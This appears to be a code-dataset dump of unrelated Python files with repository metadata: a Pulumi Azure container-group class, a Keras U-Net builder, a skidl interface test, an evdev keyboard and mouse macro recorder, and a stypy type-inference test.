if container_group_name is not None:
pulumi.set(__self__, "container_group_name", container_group_name)
if image_registry_credentials is not None:
pulumi.set(__self__, "image_registry_credentials", image_registry_credentials)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if location is not None:
pulumi.set(__self__, "location", location)
if restart_policy is not None:
pulumi.set(__self__, "restart_policy", restart_policy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if volumes is not None:
pulumi.set(__self__, "volumes", volumes)
@property
@pulumi.getter
def containers(self) -> pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]]:
"""
The containers within the container group.
"""
return pulumi.get(self, "containers")
@containers.setter
def containers(self, value: pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]]):
pulumi.set(self, "containers", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Input[Union[str, 'OperatingSystemTypes']]:
"""
The operating system type required by the containers in the container group.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: pulumi.Input[Union[str, 'OperatingSystemTypes']]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group to contain the container group to be created or updated.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="containerGroupName")
def container_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the container group to be created or updated.
"""
return pulumi.get(self, "container_group_name")
@container_group_name.setter
def container_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "container_group_name", value)
@property
@pulumi.getter(name="imageRegistryCredentials")
def image_registry_credentials(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]]]:
"""
The image registry credentials by which the container group is created from.
"""
return pulumi.get(self, "image_registry_credentials")
@image_registry_credentials.setter
def image_registry_credentials(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ImageRegistryCredentialArgs']]]]):
pulumi.set(self, "image_registry_credentials", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input['IpAddressArgs']]:
"""
The IP address type of the container group.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input['IpAddressArgs']]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="restartPolicy")
def restart_policy(self) -> Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]]:
"""
Restart policy for all containers within the container group. Currently the only available option is `always`.
"""
return pulumi.get(self, "restart_policy")
@restart_policy.setter
def restart_policy(self, value: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]]):
pulumi.set(self, "restart_policy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]]]:
"""
The list of volumes that can be mounted by containers in this container group.
"""
return pulumi.get(self, "volumes")
@volumes.setter
def volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VolumeArgs']]]]):
pulumi.set(self, "volumes", value)
class ContainerGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
container_group_name: Optional[pulumi.Input[str]] = None,
containers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContainerArgs']]]]] = None,
image_registry_credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ImageRegistryCredentialArgs']]]]] = None,
ip_address: Optional[pulumi.Input[pulumi.InputType['IpAddressArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input[Union[str, 'OperatingSystemTypes']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restart_policy: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VolumeArgs']]]]] = None,
__props__=None):
"""
A container group.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] container_group_name: The name of the container group to be created or updated.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContainerArgs']]]] containers: The containers within the container group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ImageRegistryCredentialArgs']]]] image_registry_credentials: The image registry credentials by which the container group is created from.
:param pulumi.Input[pulumi.InputType['IpAddressArgs']] ip_address: The IP address type of the container group.
:param pulumi.Input[str] location: The resource location.
:param pulumi.Input[Union[str, 'OperatingSystemTypes']] os_type: The operating system type required by the containers in the container group.
:param pulumi.Input[str] resource_group_name: The name of the resource group to contain the container group to be created or updated.
:param pulumi.Input[Union[str, 'ContainerRestartPolicy']] restart_policy: Restart policy for all containers within the container group. Currently the only available option is `always`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: The resource tags.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VolumeArgs']]]] volumes: The list of volumes that can be mounted by containers in this container group.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContainerGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A container group.
:param str resource_name: The name of the resource.
:param ContainerGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContainerGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
container_group_name: Optional[pulumi.Input[str]] = None,
containers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContainerArgs']]]]] = None,
image_registry_credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ImageRegistryCredentialArgs']]]]] = None,
ip_address: Optional[pulumi.Input[pulumi.InputType['IpAddressArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input[Union[str, 'OperatingSystemTypes']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restart_policy: Optional[pulumi.Input[Union[str, 'ContainerRestartPolicy']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VolumeArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContainerGroupArgs.__new__(ContainerGroupArgs)
__props__.__dict__["container_group_name"] = container_group_name
if containers is None and not opts.urn:
raise TypeError("Missing required property 'containers'")
__props__.__dict__["containers"] = containers
__props__.__dict__["image_registry_credentials"] = image_registry_credentials
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["location"] = location
if os_type is None and not opts.urn:
raise TypeError("Missing required property 'os_type'")
__props__.__dict__["os_type"] = os_type
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["restart_policy"] = restart_policy
__props__.__dict__["tags"] = tags
__props__.__dict__["volumes"] = volumes
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:containerinstance/v20170801preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20171001preview:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20171001preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20171201preview:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20171201preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180201preview:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180201preview:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180401:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180401:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180601:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180601:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20180901:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20180901:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20181001:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20181001:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20191201:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20191201:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20201101:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20201101:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20210301:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20210301:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20210701:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20210701:ContainerGroup"), pulumi.Alias(type_="azure-native:containerinstance/v20210901:ContainerGroup"), pulumi.Alias(type_="azure-nextgen:containerinstance/v20210901:ContainerGroup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ContainerGroup, __self__).__init__(
'azure-native:containerinstance/v20170801preview:ContainerGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ContainerGroup':
"""
Get an existing ContainerGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ContainerGroupArgs.__new__(ContainerGroupArgs)
__props__.__dict__["containers"] = None
__props__.__dict__["image_registry_credentials"] = None
__props__.__dict__["ip_address"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["os_type"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["restart_policy"] = None
__props__.__dict__["state"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["volumes"] = None
return ContainerGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def containers(self) -> pulumi.Output[Sequence['outputs.ContainerResponse']]:
"""
The containers within the container group.
"""
return pulumi.get(self, "containers")
@property
@pulumi.getter(name="imageRegistryCredentials")
def image_registry_credentials(self) -> pulumi.Output[Optional[Sequence['outputs.ImageRegistryCredentialResponse']]]:
"""
The image registry credentials by which the container group is created from.
"""
return pulumi.get(self, "image_registry_credentials")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[Optional['outputs.IpAddressResponse']]:
"""
The IP address type of the container group.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Output[str]:
"""
The operating system type required by the containers in the container group.
"""
return pulumi.get(self, "os_type")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the container group. This only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="restartPolicy")
def restart_policy(self) -> pulumi.Output[Optional[str]]:
"""
Restart policy for all containers within the container group. Currently the only available option is `always`.
"""
return pulumi.get(self, "restart_policy")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the container group. This is only valid for the response.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def volumes(self) -> pulumi.Output[Optional[Sequence['outputs.VolumeResponse']]]:
"""
The list of volumes that can be mounted by containers in this container group.
"""
return pulumi.get(self, "volumes")
| [
"[email protected]"
] | |
ac1630018ac308daa7325e487f00b2acbe3b7d63 | 1271ef78335bc7b3af9fd0d7e988edc3c3ff6edf | /python/models/sampling_model.py | 48c383d7637ce57ce95cecd01ee047b1d4f512cd | [] | no_license | BB8-2020/FARM-deforestation | 97b60699ae4468e3a53b5b970b395b2137047915 | 5b9df46ed6ff125f5697d6753a301bbf9538e555 | refs/heads/main | 2023-06-08T21:01:55.212018 | 2021-06-25T14:56:58 | 2021-06-25T14:56:58 | 351,037,514 | 0 | 0 | null | 2021-06-25T14:56:59 | 2021-03-24T10:28:56 | Jupyter Notebook | UTF-8 | Python | false | false | 2,708 | py | """File to host a modified unet implementation with emphasises on a additional up/downsampling layer."""
from keras import Input, Model
from keras import layers as keras_layers
def get_sampling_model(img_size: tuple = (512, 512), num_classes: int = 2) -> Model:
"""Create and return a UNET model.
Parameters
----------
img_size
The image size in pixel dimensions.
num_classes
The amount of classes to classify.
Returns
-------
model
The created UNET model.
"""
inputs = Input(shape=img_size + (3,))
#: [First half of the network: downsampling inputs].
x = keras_layers.Conv2D(32, 3, strides=2, padding="same")(inputs)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
#: Set aside residual.
previous_block_activation = x
#: Blocks 1, 2, 3 are identical apart from the feature depth.
for filters in [64, 128, 256, 512]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.MaxPooling2D(3, strides=2, padding="same")(x)
#: Project residual.
residual = keras_layers.Conv2D(filters, 1, strides=2, padding="same")(
previous_block_activation
)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: [Second half of the network: upsampling inputs].
for filters in [512, 256, 128, 64, 32]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.UpSampling2D(2)(x)
#: Project residual.
residual = keras_layers.UpSampling2D(2)(previous_block_activation)
residual = keras_layers.Conv2D(filters, 1, padding="same")(residual)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: Add a per-pixel classification layer.
outputs = keras_layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(
x
)
#: Define the model.
model = Model(inputs, outputs)
return model
| [
"[email protected]"
] | |
d91641c566c3d076846c9b064aa4cad9824e56fe | 243515329480040575331d2336152f4023fbc475 | /tests/test_interface.py | c7beecd72246899831b41544150867edc8d9ab96 | [
"MIT"
] | permissive | Ariyatina/skidl | 439eec7a6ae36a58fc052d8b827f88c89756cc13 | 5aace5c463403b29604a1dc2c32f4da8c86796d3 | refs/heads/master | 2023-07-18T09:23:24.173653 | 2021-07-21T13:54:39 | 2021-07-21T13:54:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,764 | py | import pytest
from skidl import *
from .setup_teardown import *
def test_interface_1():
"""Test interface."""
@subcircuit
def resdiv(gnd, vin, vout):
res = Part("Device", "R", dest=TEMPLATE)
r1 = res(value="1k")
r2 = res(value="500")
cap = Part("Device", "C", dest=TEMPLATE)
c1 = cap()
c2 = cap(value="1uF")
bus1 = Bus("BB", 10)
vin += r1[1], c1[1] # Connect the input to the first resistor.
gnd += r2[2], c2[2] # Connect the second resistor to ground.
vout += (
r1[2],
c1[2],
r2[1],
c2[1],
) # Output comes from the connection of the two resistors.
intfc = Interface(gnd=Net("GND"), vin=Net("VI"), vout=Net("VO"),)
intfc.gnd.aliases += "GND"
intfc.gnd.aliases += "GNDA"
resdiv(**intfc)
resdiv(**intfc)
assert len(default_circuit.parts) == 8
assert len(default_circuit.get_nets()) == 3
assert len(default_circuit.buses) == 2
assert len(Net.fetch("GND")) == 4
assert len(Net.fetch("VI")) == 4
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 4
assert len(intfc.vin) == 4
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 4
assert len(intfc["vin"]) == 4
assert len(intfc["vout"]) == 8
intfc.gnd += Pin()
intfc["vin"] += Pin()
assert len(Net.fetch("GND")) == 5
assert len(Net.fetch("VI")) == 5
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 5
assert len(intfc.vin) == 5
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 5
assert len(intfc["vin"]) == 5
assert len(intfc["vout"]) == 8
assert len(intfc["GND"]) == 5
assert len(intfc["GNDA"]) == 5
| [
"[email protected]"
] | |
204d8cf4a426abf12e53d13fbed07ba251bde4a7 | 722de5766ccf7e7a2d63c425a0c8dd78287f1853 | /homework4/Ex12.py | fd1aefcab13cf603c44acf56864e46ba515620a2 | [] | no_license | Alice-Avetisyan/project | 79a61bbd0ce3f5d8571a3c1d112f078f85583e0b | eb51676cdce1ff787738317aacb4c869a001b769 | refs/heads/master | 2020-07-30T09:04:07.555681 | 2019-12-15T17:15:05 | 2019-12-15T17:15:05 | 210,166,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | import re
string = 'A reaaaalllyyy long string'
search = re.search('rea', string)
print(search) | [
"[email protected]"
] | |
4bc4705b0c5f6e25b33b4c3b440a2931839d8e1d | e43702704709b5c64722f8f21c530e81cbcfa3f4 | /Hack_et_Bidouille/step_9/MacroKeyboard.py | bb84c068b0693c1f03f4030a9ca5d21071edbeaa | [] | no_license | GLMF/GLMF200 | 0db0546607343743ea1abe22c5836fe88b3f8459 | 56d80954566b4ab3f602d97e931ba20bba65a7e8 | refs/heads/master | 2021-01-12T06:48:31.098483 | 2016-12-19T06:02:13 | 2016-12-19T06:02:13 | 76,832,753 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,346 | py | import evdev
from evdev import ecodes, UInput
import key
from configparser import ConfigParser
import ast
from gui.KeyboardLeds import KeyboardLeds
from gui.Notify import Notify
import logging
import logging.config
import pyautogui
class MacroKeyboard:
MOUSE_BTN = {key.BUTTON_LEFT : 'left', key.BUTTON_RIGHT : 'right' }
def __init__(self, dev, dev_mouse, activeLog=False, configFile='keyboardrc.ini', logFile='keyboardlogrc.ini'):
self.__device = evdev.InputDevice(dev)
self.__device_mouse = evdev.InputDevice(dev_mouse)
self.leds = KeyboardLeds(self.__device)
self.leds.reset()
self.notify = Notify('Keyboard Macros')
self.notify.send('Running and connected to <b>{}</b>'.format(dev))
self.__activeLog = activeLog
if self.__activeLog:
logging.config.fileConfig(logFile)
self.__logger = logging.getLogger('root')
self.__recording_buffer = []
self.__recording = False
self.__attribute_key = False
self.__protect = False
self.__unprotect = False
self.__recording_mouse_buffer = []
self.__recording_mouse = False
self.__configFile = configFile
self.__macros = {} # defined in readConfig()
self.readConfig()
self.__ui = UInput()
########
### Logging management
def log(self, message, cat='info'):
if self.__activeLog:
if cat == 'info':
self.__logger.info(message)
elif cat == 'debug':
self.__logger.debug(message)
elif cat == 'debug':
self.__logger.debug(message)
elif cat == 'error':
self.__logger.debug(message)
########
### Recording management
def startRecording(self):
self.log('Start recording macro')
self.notify.send('Start recording macro')
self.leds.numLockOn()
self.__recording = True
def stopRecording(self):
self.log('Buffer: {}'.format(self.__recording_buffer))
self.leds.numLockOff()
self.leds.capsLockOn()
self.notify.send('Stop recording macro\nHit a key to save the buffer')
self.__recording = False
def saveMacro(self, key):
if key in self.__macros and 'lock' in self.__macros[key]:
self.notify.send('Macro on <b>{}</b> is protected'.format(key))
else:
self.__macros[key] = {'key_down': self.__recording_buffer}
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
def protectKey(self, key):
self.__macros[key]['lock'] = True
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
def unprotectKey(self, key):
if 'lock' in self.__macros[key]:
del self.__macros[key]['lock']
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
########
### Mouse recording management
def startMouseRecording(self):
self.log('Start mouse recording macro')
self.notify.send('Start mouse recording macro')
self.leds.numLockOn()
self.__recording_mouse = True
self.mouseRecording()
def mouseRecording(self):
for event in self.__device_mouse.read_loop():
if event.type == ecodes.EV_KEY:
# Click detection
if (event.code == ecodes.BTN_MOUSE or event.code == ecodes.BTN_RIGHT) and event.value == 1:
(mouse_x, mouse_y) = pyautogui.position()
self.notify.send('Mouse clic on button {} ({}, {})'.format(MacroKeyboard.MOUSE_BTN[event.code], mouse_x, mouse_y))
self.__recording_mouse_buffer.append((event.code, (mouse_x, mouse_y)))
self.log(self.__recording_mouse_buffer)
elif event.code == ecodes.BTN_MIDDLE and event.value == 1:
self.log('Stop mouse recording macro')
self.notify.send('Stop mouse recording macro\nHit a key to save the buffer')
self.leds.numLockOff()
self.leds.capsLockOn()
return
def saveMouseMacro(self, key):
if key in self.__macros and 'lock' in self.__macros[key]:
self.notify.send('Macro on <b>{}</b> is protected'.format(key))
else:
self.__macros[key] = {'mouse': self.__recording_mouse_buffer}
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.writeConfig()
########
### Configuration file management
def readConfig(self):
self.__macros = {}
config = ConfigParser()
config.read(self.__configFile)
for keysym in config.sections():
self.log(config[keysym], cat='debug')
actions_list = {}
for action in config[keysym]:
actions_list[action] = ast.literal_eval(config[keysym][action])
self.__macros[keysym] = actions_list
self.log('Macro pour {} => {}'.format(keysym, self.__macros[keysym]), cat='debug')
self.log('Macros: {}'.format(self.__macros), cat='debug')
def writeConfig(self):
config = ConfigParser()
for keysym, action in self.__macros.items():
config[keysym] = action
try:
with open(self.__configFile, 'w') as fic:
config.write(fic)
except:
self.log('Write error on config file'.format(self.__configFile), cat='error')
self.notify.send('Write error on config file <b>{}</b>'.format(self.__configFile))
exit(2)
########
### Keys management
def pressKey(self, keysym):
self.__ui.write(ecodes.EV_KEY, ecodes.ecodes[keysym], 1)
self.__ui.write(ecodes.EV_KEY, ecodes.ecodes[keysym], 0)
self.__ui.syn()
def pressKeys(self, keysymList):
for keysym in keysymList:
self.pressKey(keysym)
########
### Mouse management
def activeMouseMvt(self, mousemvt):
btn, (mouse_x, mouse_y) = mousemvt
pyautogui.moveTo(mouse_x, mouse_y)
pyautogui.click(button=MacroKeyboard.MOUSE_BTN[btn])
def activeMouseMvts(self, mousemvtsList):
for mousemvt in mousemvtsList:
self.activeMouseMvt(mousemvt)
########
### Keyboard main management
def read(self):
for event in self.__device.read_loop():
if event.type == ecodes.EV_KEY:
# Recording management with key.RECORDING
if event.code == key.RECORDING and not self.__attribute_key and event.value == 1:
if not self.__recording:
self.startRecording()
else:
self.stopRecording()
self.__attribute_key = True
# Recording keys
if self.__recording and event.code != key.RECORDING and event.value == 1:
self.notify.flash('Hit on <b>{}</b>'.format(ecodes.KEY[event.code]))
self.__recording_buffer.append(ecodes.KEY[event.code])
# Set attribute to a macro
elif self.__attribute_key and event.code != key.RECORDING and event.value == 1:
self.__attribute_key = False
self.saveMacro(ecodes.KEY[event.code])
self.notify.send('Macro saved in <b>{}</b>'.format(ecodes.KEY[event.code]))
self.leds.capsLockOff()
self.__recording_buffer = []
self.log('Macros: {}'.format(self.__macros), cat='debug')
# Protect a macro
elif event.code == ecodes.KEY_TAB and event.value == 1:
self.notify.send('Hit a key to indicate macro to protect')
self.leds.capsLockOn()
self.__protect = True
elif self.__protect and event.value == 1:
if ecodes.KEY[event.code] in self.__macros:
self.protectKey(ecodes.KEY[event.code])
self.notify.send('Macro <b>{}</b> is protected'.format(ecodes.KEY[event.code]))
else:
self.notify.send('Macro not found')
self.leds.capsLockOff()
self.__protect = False
# Unprotect a macro
elif event.code == ecodes.KEY_CAPSLOCK and event.value == 1:
self.notify.send('Hit a key to indicate macro to unprotect')
self.leds.capsLockOn()
self.__unprotect = True
elif self.__unprotect and event.value == 1:
if ecodes.KEY[event.code] in self.__macros:
self.unprotectKey(ecodes.KEY[event.code])
self.notify.send('Macro <b>{}</b> is no more protected'.format(ecodes.KEY[event.code]))
else:
self.notify.send('Macro not found')
self.leds.capsLockOff()
self.__unprotect = False
# Mouse recording
elif event.code == key.RECORDING_MOUSE and event.value == 1:
self.startMouseRecording()
elif self.__recording_mouse and event.code != key.RECORDING and event.code != key.RECORDING_MOUSE and event.value == 1:
self.saveMouseMacro(ecodes.KEY[event.code])
self.notify.send('Macro saved in <b>{}</b>'.format(ecodes.KEY[event.code]))
self.leds.capsLockOff()
self.__recording_mouse_buffer = []
self.log('Macros: {}'.format(self.__macros), cat='debug')
self.__recording_mouse = False
# Execute macros
else:
for keysym, action in self.__macros.items():
if event.code == ecodes.ecodes[keysym] and event.value == 1:
if 'key_down' in action:
self.pressKeys(action['key_down'])
elif 'mouse' in action:
self.activeMouseMvts(action['mouse'])
| [
"[email protected]"
] | |
b3d298466335c9f5ca3764f658192afc3d03c556 | eb3683f9127befb9ef96d8eb801206cf7b84d6a7 | /stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/slice/error_slice_parameters.py | 6c7b78a0cf9f6ccf806fb2b85a199b8498b304a2 | [] | no_license | ComputationalReflection/stypy | 61ec27333a12f76ac055d13f8969d3e0de172f88 | be66ae846c82ac40ba7b48f9880d6e3990681a5b | refs/heads/master | 2021-05-13T18:24:29.005894 | 2018-06-14T15:42:50 | 2018-06-14T15:42:50 | 116,855,812 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,607 | py |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "slice method is present, but is invoked with a wrong number of parameters"
3:
4: if __name__ == '__main__':
5: # Call options
6: # (AnyType) -> <type 'slice'>
7: # (AnyType, AnyType) -> <type 'slice'>
8: # (AnyType, AnyType, AnyType) -> <type 'slice'>
9:
10:
11: # Call the builtin with incorrect number of parameters
12: # Type error
13: ret = slice(3, 4, 5, 6)
14:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'slice method is present, but is invoked with a wrong number of parameters')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 13):
# Call to slice(...): (line 13)
# Processing the call arguments (line 13)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 16), 'int')
int_4 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 19), 'int')
int_5 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 22), 'int')
int_6 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 25), 'int')
# Processing the call keyword arguments (line 13)
kwargs_7 = {}
# Getting the type of 'slice' (line 13)
slice_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 13, 10), 'slice', False)
# Calling slice(args, kwargs) (line 13)
slice_call_result_8 = invoke(stypy.reporting.localization.Localization(__file__, 13, 10), slice_2, *[int_3, int_4, int_5, int_6], **kwargs_7)
# Assigning a type to the variable 'ret' (line 13)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 13, 4), 'ret', slice_call_result_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
| [
"[email protected]"
] | |
63f5c6f169809e05a1c1c88bec3d9875c56284bd | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_thudded.py | a00c7db9bd98c96d51333c65808b2fee71f3d38a | [
"MIT"
